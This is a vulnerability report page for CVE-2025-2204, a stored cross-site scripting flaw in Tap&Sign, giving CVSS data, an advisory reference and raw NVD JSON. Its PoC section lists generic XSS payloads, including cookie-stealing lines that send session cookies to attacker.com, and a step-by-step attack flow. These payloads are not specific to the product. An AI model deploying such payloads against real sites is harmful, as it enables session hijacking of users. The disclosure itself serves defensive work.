Security Vulnerability Report
CVE-2025-2204 CVSS 4.7 MEDIUM

CVE-2025-2204

Published: 2026-01-23 12:15:48
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Tapandsign Technologies Software Inc. Tap&Sign allows Cross-Site Scripting (XSS). This issue affects Tap&Sign: through 23012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Tap&Sign <= 23012026

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-2204 Tap&Sign XSS PoC -->
<!-- Stored XSS payload; requires a high-privilege user account -->

<!-- Basic XSS payload -->
<script>alert(document.cookie)</script>

<!-- Event-handler XSS payload -->
<img src=x onerror=alert('XSS')>

<!-- Session-cookie theft payload -->
<script>
document.write('<img src="http://attacker.com/steal?cookie='+document.cookie+'">');
</script>

<!-- Full exploitation example (submit in a Tap&Sign text input field) -->
Payload: <svg/onload=fetch('https://attacker.com/log?data='+btoa(document.cookie))>

<!-- Attack flow: -->
<!-- 1. Attacker logs in to Tap&Sign as a high-privilege user -->
<!-- 2. Inject the malicious XSS payload into the vulnerable input field -->
<!-- 3. The malicious script is stored in the database -->
<!-- 4. Other users visit the page containing the malicious content -->
<!-- 5. The malicious script executes in the victim's browser -->
<!-- 6. Attacker obtains the user's session or sensitive information -->

References

https://www.usom.gov.tr/bildirim/tr-26-0004
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-2204", "sourceIdentifier": "[email protected]", "published": "2026-01-23T12:15:48.463", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Tapandsign Technologies Software Inc. Tap&Sign allows Cross-Site Scripting (XSS).This issue affects Tap&Sign: through 23012026.\n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web (XSS o 'cross-site scripting') en Tapandsign Technologies Software Inc. Tap&amp;Sign permite cross-site scripting (XSS). Este problema afecta a Tap&amp;Sign: hasta el 23012026.\n\nNOTA: Se contactó al proveedor con antelación sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-26-0004", "source": "[email protected]"}]}}